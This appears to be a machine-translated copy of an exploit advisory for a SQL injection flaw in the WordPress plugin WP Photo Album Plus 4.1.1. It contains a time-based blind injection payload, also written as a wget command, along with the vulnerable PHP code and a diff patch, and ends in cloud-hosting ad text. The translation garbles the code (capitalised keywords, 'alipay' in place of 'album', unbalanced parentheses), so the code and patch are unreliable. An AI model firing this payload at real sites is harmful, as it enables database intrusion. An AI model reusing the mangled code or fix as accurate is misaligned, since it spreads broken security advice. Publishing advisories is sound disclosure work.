Title: WP Photo Album Plus <= 4.1.1 SQL Injection Vulnerability
Author: Skraps (jackie. craig. sparks (at) live.com www.2cto.com jackie. craig. sparks (at) gmail.com @ skraps_foo)
Plug-in address: http://wordpress.org/extend/plugins/wp-photo-album-plus/
: Http://downloads.wordpress.org/plugin/wp-photo-album-plus.zip
Affected Version: 4.1.1 (tested)
---------------
PoC (POST data)
---------------
Http://www.bkjia.com/wordpress /? Page_id = 7 & wppa-album = 1 AND 1 = IF (2> 1, BENCHMARK (500000000, MD5 (CHAR (115,113,108,109, 97,112), 0) & wppa-cover = 0 & wppa-occur = 1
Wppa-album = 1 AND 1 = IF (2> 1, BENCHMARK (500000000, MD5 (CHAR (115,113,108,109, 97,112), 0) & wppa-cover = 0 & wppa-occur = 1
Example:
Wget http://www.bkjia.com/wordpress /? Page_id = 7 & wppa-album = 1 AND 1 = IF (2> 1, BENCHMARK (500000000, MD5 (CHAR (115,113,108,109, 97,112), 0) & wppa-cover = 0 & wppa-occur = 1
---------------
Defect code
---------------
Line 490 of wppa-functions.php:
If ($ occur ==$ ref_occur) & wppa_get_get ('album ')){
$ Id = wppa_get_get ('alipay ');
$ Wppa ['is _ cover'] = wppa_get_get ('cover ');
}
...
...
If (is_numeric ($ id )){
If ($ wppa ['is _ cover']) $ q = $ wpdb-> prepare ('select * from '. WPPA_ALBUMS. 'where' id' = % s', $ id );
Else $ q = $ wpdb-> prepare ('select * FROM '. WPPA_ALBUMS. 'Where 'A _ parent' = % s'. wppa_get_album_order (), $ id );
$ Albums = $ wpdb-> get_results ($ q, 'array _ ');
Line 3170 of wppa-functions.php:
Function wppa_get_get ($ index, $ default = false ){
If (isset ($ _ GET ['vpa-'. $ index]) {// New syntax first
Return $ _ GET ['vpa-'. $ index];
}
If (isset ($ _ GET [$ index]) {// Old syntax
Return $ _ GET [$ index];
}
Return $ default;
}
---------------
Patch
---------------
* **./Wppa-functions.php 19:15:11. 574775456-0400
---./Wppa-functions.php.new 19:13:14. 735784321-0400
***************
* ** 506,513 ****
// Top-level album has no cover
If ($ id = '0') $ wppa ['is _ cover'] = '0 ';
-
// Do the query
If (is_numeric ($ id )){
If ($ wppa ['is _ cover']) $ q = $ wpdb-> prepare ('select * from '. WPPA_ALBUMS. 'where' id' = % s', $ id );
Else $ q = $ wpdb-> prepare ('select * FROM '. WPPA_ALBUMS. 'Where 'A _ parent' = % s'. wppa_get_album_order (), $ id );
--- 506,513 ----
// Top-level album has no cover
If ($ id = '0') $ wppa ['is _ cover'] = '0 ';
// Do the query
+ $ Id = substr ($ id, 3 );
If (is_numeric ($ id )){
If ($ wppa ['is _ cover']) $ q = $ wpdb-> prepare ('select * from '. WPPA_ALBUMS. 'where' id' = % s', $ id );
Else $ q = $ wpdb-> prepare ('select * FROM '. WPPA_ALBUMS. 'Where 'A _ parent' = % s'. wppa_get_album_order (), $ id );
***************
* ** 3384,3387 ****
Global $ wppa;
If ($ wppa ['any']) echo $ wppa ['searchresults'];
! }
\ No newline at end of file
--- 3384,3387 ----
Global $ wppa;
If ($ wppa ['any']) echo $ wppa ['searchresults'];
! }
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
